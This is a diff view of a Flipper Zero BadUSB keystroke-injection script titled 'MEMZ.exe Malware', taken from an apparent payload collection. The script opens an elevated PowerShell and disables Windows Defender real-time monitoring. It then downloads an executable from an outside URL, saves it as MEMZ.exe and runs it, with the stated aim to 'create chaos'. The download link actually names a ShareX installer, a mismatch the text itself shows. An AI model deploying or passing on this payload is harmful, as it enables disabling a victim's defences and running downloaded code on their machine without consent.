🤬
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Execution/MemzMalware.txt
     1 +REM Title: MEMZ.exe Malware
     2 +REM Author: UNC0V3R3D
     3 +REM Description: I am not responsible for any DAMAGE!! Opens PowerShell, downloads File and runs File to create chaos. I
     4 +REM Version: 1.0
     5 +REM Category: Execution
     6 +DEFAULT_DELAY 700
     7 +DELAY 500
     8 +GUI r
     9 +DELAY 200
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +DELAY 800
     12 +LEFTARROW
     13 +DELAY 680
     14 +ENTER
     15 +DELAY 800
     16 +REM Disables Windows Defender
     17 +STRING Set-MpPreference -DisableRealtimeMonitoring $true
     18 +DELAY 200
     19 +ENTER
     20 +DELAY 750
     21 +REM Please put a full path Example: (C:\user\desktop) and dont write the "\MEMZ.exe" because its already there
     22 +STRING $Path = "Path to store file here"
     23 +DELAY 200
     24 +ENTER
     25 +DELAY 500
     26 +REM Basically downloads the MEMZ.exe malware
     27 +STRING $webClient = New-Object System.Net.WebClient; $webClient.DownloadFile("https://github.com/ShareX/ShareX/releases/download/v13.1.0/ShareX-13.1.0-setup.exe", "$Path\MEMZ.exe")
     28 +DELAY 200
     29 +ENTER
     30 +DELAY 500
     31 +REM Executes MEMZ.exe
     32 +STRING Start-Process -FilePath "$Path\MEMZ.exe"
     33 +DELAY 500
     34 +ENTER
     35 +DELAY 200
     36 +STRING exit
     37 +
     38 +
     39 + 
Please wait...
Page is in error, reload to recover